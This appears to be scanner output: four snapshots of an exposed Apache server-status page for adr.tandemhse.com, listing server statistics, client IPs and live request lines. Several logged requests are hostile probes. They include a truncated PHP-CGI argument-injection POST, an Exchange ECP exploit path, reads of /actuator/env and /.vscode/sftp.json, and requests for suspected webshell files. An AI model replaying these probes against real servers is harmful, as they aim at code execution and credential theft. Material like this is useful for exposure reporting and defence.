Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755f7c1266c
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 22-Nov-2025 16:38:18 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 383 Parent Server MPM Generation: 382 Server uptime: 71 days 4 hours 17 minutes 15 seconds Server load: 0.07 0.15 0.16 Total accesses: 2234248 - Total Traffic: 69.3 GB - Total Duration: 1399249348 CPU Usage: u155.6 s214.27 cu12368 cs7082.55 - .322% CPU load .363 requests/sec - 11.8 kB/second - 32.5 kB/request - 626.273 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0564020no0yes010000 1564019no0yes010000 2564022no0yes010000 3564157no1yes010000 4564021no0yes19000 Sum501 149000 ____________________________________________W_____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3825640200/3/42062_ 1.5779988317883270.00.001569.81 159.223.132.86http/1.1barrerasdecontencion.com:443GET /v2/api-docs HTTP/1.1 0-3825640200/2/41436_ 1.3814580471607990.00.571347.32 172.68.124.136h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-3825640200/4/41849_ 1.65535786185069640.00.011380.22 162.158.122.175h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/1/41588_ 0.6914627200788120.00.031385.12 172.71.183.191h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/5/42163_ 1.5879380189043880.00.011431.40 159.223.132.86http/1.1barrerasdecontencion.com:443GET /.DS_Store HTTP/1.1 0-3825640200/1/41959_ 1.385300195302680.00.001417.80 172.68.124.136h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/1/42135_ 0.117990270024860.00.021337.99 162.158.167.30h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/1/41527_ 0.975300179486340.00.001404.57 172.71.131.41h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3825640200/3/42071_ 1.377930193557620.00.001320.89 172.68.124.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/2/41892_ 1.3814571305417240.00.011509.55 172.68.124.136h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3825640190/3/46330_ 1.05794483205289890.00.051511.76 172.71.167.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/2/46948_ 0.7326950243565780.00.001516.86 172.70.240.41h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/5/46542_ 1.5980092250660070.00.011461.00 159.223.132.86http/1.1barrerasdecontencion.com:443GET /webjars/swagger-ui/index.html HTTP/1.1 1-3825640190/3/46370_ 1.5979975697616890.00.001426.99 159.223.132.86http/1.1barrerasdecontencion.com:443GET /swagger/v1/swagger.json HTTP/1.1 1-3825640190/1/47133_ 0.142695439221518560.00.031507.09 104.22.1.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/2/47627_ 1.048000217500000.00.001422.74 104.23.225.4h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/0/46853_ 0.007996254006410.00.001421.82 172.68.23.231h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/3/47285_ 1.5979579204246700.00.001436.13 159.223.132.86http/1.1barrerasdecontencion.com:443GET /v2/_catalog HTTP/1.1 1-3825640190/0/45687_ 0.007950331713460.00.001295.32 172.68.23.37h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/2/47022_ 1.6079497457373050.00.001377.25 159.223.132.86http/1.1barrerasdecontencion.com:443GET /login.action HTTP/1.1 2-3825640220/2/43969_ 0.765290226418870.00.031347.65 172.71.99.208h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/0/42988_ 0.007921369784640.00.001257.60 162.158.41.217h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/3/43669_ 1.7279988281709680.00.031370.83 159.223.132.86http/1.1barrerasdecontencion.com:443GET /v3/api-docs HTTP/1.1 2-3825640220/1/42972_ 0.777922212901520.00.021293.75 104.23.172.63h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/1/43130_ 0.767990181052250.00.001479.88 104.23.170.123h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/2/43593_ 1.83534312203267830.00.051277.79 162.158.122.175h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3825640220/1/43134_ 0.765290200866830.00.001325.26 172.71.99.58h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3825640220/1/43401_ 1.72797392219265520.00.021326.23 172.70.126.77h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/2/43456_ 1.097970220914130.00.001504.64 172.71.130.40h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/2/43602_ 1.73797114241292590.00.031383.69 159.223.132.86http/1.1barrerasdecontencion.com:443POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-3825641570/37/48475_ 3.44224294072390.00.321530.91 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3825641570/41/47010_ 3.4910260451060.00.521338.09 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-3825641570/45/48229_ 3.4820280704080.00.381516.72 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-3825641570/49/47440_ 3.4920308691760.00.681626.33 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-3825641570/47/47492_ 3.4730232234410.00.551393.31 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-3825641570/46/47411_ 3.193922218251570.00.521506.43 172.71.146.22h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3825641570/33/47896_ 3.4900266278160.00.251566.49 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3825641570/44/47801_ 3.4700343986270.00.331533.06 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-3825641570/36/47143_ 3.05278876579940.00.151465.21 159.223.132.86http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3825641570/36/48203_ 3.4910363267370.00.401479.51 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-3825640210/38/43660_ 3.623526370230980.00.921367.31 104.23.229.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3825640210/46/43730_ 3.8020258726550.017.591442.27 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-3825640210/42/43722_ 3.53219218694760.00.561475.36 162.158.122.176h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3825640210/43/44109_ 3.8000235323580.01.021331.79 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 4-3825640210/31/43351W 3.8000245881990.01.091299.06 143.244
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75555811fa5
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 20-Nov-2025 21:47:26 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 373 Parent Server MPM Generation: 372 Server uptime: 69 days 9 hours 26 minutes 23 seconds Server load: 0.05 0.09 0.09 Total accesses: 2178036 - Total Traffic: 67.9 GB - Total Duration: 1326354039 CPU Usage: u213.36 s232.1 cu11991 cs6794.96 - .321% CPU load .363 requests/sec - 11.9 kB/second - 32.7 kB/request - 608.968 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0371969no1yes28000 1371836no0yes010000 2371835no0yes010000 3371837no0yes010000 4371838no3yes010001 Sum504 248001 _WR_______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3723719690/436/41594_ 30.813427310013880.06.971550.98 172.68.14.65h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3723719690/457/40943W 30.7900462301610.09.071334.47 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3723719690/453/41414R 30.8040177736320.09.661358.10 172.68.187.29http/1.1lcftech.es:443 0-3723719690/429/41138_ 30.8210195077860.09.341374.64 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3723719690/426/41725_ 30.8210183227060.027.281419.77 162.158.62.250h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3723719690/449/41478_ 30.8200191056290.08.771394.15 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3723719690/454/41687_ 30.670466261589440.035.731323.71 108.162.241.224h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3723719690/452/41030_ 30.812571175807170.09.111393.27 104.23.253.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3723719690/448/41613_ 30.46070188238890.014.191303.10 197.254.237.210http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3723719690/418/41438_ 30.8210222009090.010.591493.71 104.23.190.174h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/115/46137_ 14.3730201074410.02.371508.64 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-3723718360/99/46698_ 13.9510251232628480.02.401511.82 172.71.211.61h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/112/46323_ 13.9430245914220.03.801457.49 172.71.148.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/111/46165_ 14.3720692607210.02.681423.51 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-3723718360/95/46928_ 14.106920212724970.02.421503.18 172.71.120.35h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/104/47379_ 12.36692435213597970.02.261417.04 172.68.234.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/98/46648_ 13.37687719249347410.01.481418.06 172.70.227.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/99/47077_ 12.9720198492910.03.421421.41 172.68.103.69h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/101/45468_ 13.746871327405610.02.791289.76 162.158.152.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/111/46828_ 13.9610251453618150.02.191372.04 162.158.178.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/41/42454_ 9.0610206909010.00.321303.77 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3723718350/40/41489_ 9.0701352580920.01.481224.20 162.158.62.247h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/40/42131_ 8.7110261269718220.00.701336.24 172.68.211.182h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/44/41411_ 8.7110261200663520.00.371261.46 172.68.211.7h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/48/41662_ 8.7110260168316700.00.571434.61 172.71.215.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/35/42070_ 8.11102664193688470.01.471240.68 13.74.149.244http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/29/41634_ 8.7110262186016340.00.281271.74 172.68.211.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/43/41885_ 8.140648195307260.00.361290.46 172.71.235.68h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/45/41948_ 8.6910250200894510.00.471456.42 162.158.162.96h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/36/42008_ 8.12102570227509290.00.301337.50 13.74.149.244http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/37/46784_ 8.6110250274440200.00.961497.91 172.68.211.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/22/45517_ 9.0000236497780.00.561310.96 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3723718370/23/46743_ 8.746850269952710.021.961488.32 172.70.50.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/22/45927_ 7.406851292895910.00.461556.56 162.158.103.34h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/24/45814_ 9.0040213321260.00.591365.25 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 3-3723718370/27/45899_ 8.00680643207881200.00.571478.53 172.69.36.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/25/46377_ 7.384311249910900.00.701515.30 162.158.103.34h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/27/46337_ 8.031025769326214800.00.581475.88 172.70.144.67h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3723718370/21/45740_ 8.596800865485420.00.491440.26 172.70.208.18h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/27/46727_ 8.6110250351649810.00.501448.05 162.158.179.113h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3723718380/417/41699_ 35.1100354156790.08.161331.91 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 4-3723718380/447/41661_ 35.1220225035290.016.221376.42 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-3723718380/471/41884_ 35.1020197539220.08.791416.27 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-3723718380/429/42231_ 35.112223218569850.021.661294.69 172.70.110.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3723718380/434/41652_ 35.122023350554
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7550ed7c7a1
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 16-Nov-2025 23:08:44 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 355 Parent Server MPM Generation: 354 Server uptime: 65 days 10 hours 47 minutes 41 seconds Server load: 0.02 0.10 0.09 Total accesses: 2044279 - Total Traffic: 63.5 GB - Total Duration: 1246413531 CPU Usage: u163.25 s210.26 cu11254.7 cs6373.93 - .318% CPU load .362 requests/sec - 11.8 kB/second - 32.6 kB/request - 609.708 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04126551no0yes010000 14126554no0yes010000 24126552no1yes010000 34126685no1yes19000 44126553no0yes010000 Sum502 149000 ___________________________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-35441265510/9/37630_ 7.071301278290782870.00.151394.91 172.70.108.241h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/5/36958_ 5.1772102441963110.00.051233.32 172.68.135.160h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/1/37317_ 3.827210103157926810.00.001245.55 34.57.187.27h2barrerasdecontencion.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-35441265510/7/37361_ 5.1873610176513250.00.001298.64 172.68.135.217h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/5/37646_ 2.9413011163473940.00.011286.88 5.181.27.149h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/3/37638_ 0.5312960172259680.00.001270.35 172.64.192.107h2lcftech.es:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 0-35441265510/4/37712_ 5.1812960241998480.00.021184.97 172.68.134.196h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/4/37247_ 3.827215124156691560.00.021261.46 91.134.84.178h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/6/37540_ 5.2572150167718000.00.111194.09 162.158.122.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/6/37393_ 3.9873610196213950.00.351315.79 162.158.123.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/10/43588_ 7.0420190276680.00.071394.75 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-35441265540/9/44250_ 5.407210219025750.00.111416.96 162.158.91.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/8/43816_ 5.40539291230077190.00.171378.79 162.158.91.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/7/43665_ 5.40539216676630640.00.021333.91 162.158.91.85h2tandemsl.com:443idle, streams: 0/16/16/0/0 (open/recv/resp/push/rst) 1-35441265540/8/44399_ 5.393267258184250490.00.161402.72 162.158.91.85h2tandemsl.com:443done, streams: 0/20/20/0/0 (open/recv/resp/push/rst) 1-35441265540/11/44922_ 7.0410197674860.00.121331.79 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-35441265540/8/44273_ 6.87544328236609310.00.081349.09 172.71.135.79h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/5/44677_ 5.873262604188514210.00.041321.53 172.69.155.200h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/12/42938_ 7.0470302412900.00.391212.39 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 1-35441265540/9/44338_ 5.393262239436618010.00.461297.54 162.158.91.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/144/41365_ 13.3800200931460.03.461256.48 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 2-35441265520/130/40412_ 13.3950347271300.02.811191.69 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-35441265520/119/41110_ 13.2504264942470.02.791282.14 74.176.64.167http/1.1cinre-backend.tandemhse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-35441265520/147/40363_ 13.32321195453010.02.271219.34 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/129/40655_ 13.35518163456500.02.071407.53 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/137/40979_ 13.3940188475600.09.241211.93 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-35441265520/134/40581_ 13.3940180985380.02.931225.67 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-35441265520/147/40830_ 13.3930190295180.01.531261.22 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-35441265520/127/40899_ 13.2543195682960.04.211424.70 74.176.64.167http/1.1cinre-backend.tandemhse.com:443GET /la.php HTTP/1.1 2-35441265520/132/40932_ 13.3900222112530.02.041278.07 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-35441266850/175/44411_ 14.5420260430920.04.081396.54 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-35441266850/173/43076_ 14.5310222012720.03.221244.86 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-35441266850/174/44154_ 14.5410257090240.02.921382.95 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-35441266850/152/43483_ 14.4320277255620.01.951450.32 74.176.64.167http/1.1cinre-backend.tandemhse.com:80GET /mail.php HTTP/1.1 3-35441266850/177/43431_ 14.5440201033980.02.251298.13 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-35441266850/164/43440W 14.5400196994520.025.071385.54 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-35441266850/151/43847_ 14.5400233083100.015.761451.28 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-35441266850/170/43894_ 14.5420309942730.02.691374.18 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-35441266850/169/43132_ 14.4340849934710.03.661370.85 74.176.64.167http/1.1cinre-backend.tandemhse.com:80GET /berlin.php HTTP/1.1 3-35441266850/164/44317_ 14.4350337873820.02.321378.95 74.176.64.167http/1.1cinre-backend.tandemhse.com:80GET /i1.php HTTP/1.1 4-35441265530/4/38267_ 2.2673611333771440.00.001224.66 162.158.110.243h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/8/38372_ 4.7573660202974330.00.171275.41 104.22.7.128h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/4/38519_ 3.0289251177092100.00.021299.53 162.158.193.188h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/7/38823_ 4.7573660192630150.00.041166.10 104.22.7.164h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/3/38244_ 4.25736121215314270.0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755f4fa293d
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 14-Nov-2025 19:34:51 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 344 Parent Server MPM Generation: 343 Server uptime: 63 days 7 hours 13 minutes 49 seconds Server load: 0.23 0.12 0.22 Total accesses: 2007419 - Total Traffic: 62.6 GB - Total Duration: 1148817168 CPU Usage: u146.34 s190.47 cu10988.2 cs6200.49 - .32% CPU load .367 requests/sec - 12.0 kB/second - 32.7 kB/request - 572.286 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03949547no0yes010000 13949546no0yes010000 23949549no0yes010000 33949548no2yes19010 43949682no3yes010000 Sum505 149010 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34339495470/10/37520_ 2.10425290294900.00.171391.84 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/8/36858_ 2.1071441456330.00.101231.60 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-34339495470/6/37228_ 2.06920157539070.00.071244.04 198.41.227.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/3/37254_ 1.39930176139520.00.031296.46 162.158.82.150h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/12/37533_ 1.99880162872220.00.301285.13 162.158.87.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/8/37541_ 1.38870171796920.00.551267.56 162.158.82.152h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/9/37601_ 2.06940241445300.00.131182.71 172.69.67.6h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/8/37138_ 1.8588434156206770.00.101259.19 172.69.34.161h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/7/37443_ 1.8071166798300.00.071191.13 162.158.163.168h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/5/37293_ 1.80870195700120.00.091313.70 172.70.142.14h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/3/42636_ 1.2188499180424000.00.031377.92 104.23.254.81h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/3/43353_ 1.19890213715710.00.041385.15 162.158.82.168h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/5/42907_ 1.72880208323150.00.151344.31 162.158.120.170h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/2/42758_ 1.6689458200179660.00.031316.00 172.71.120.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/6/43459_ 1.78940179811500.00.081385.57 172.71.166.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/1/43998_ 1.2893860188955020.00.021313.95 172.68.23.192h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/6/43280_ 1.302497228343830.00.091326.45 172.69.176.8h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/5/43739_ 1.78930181510650.00.131290.54 172.69.67.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-34339495460/6/42001_ 1.8220290435390.00.051197.23 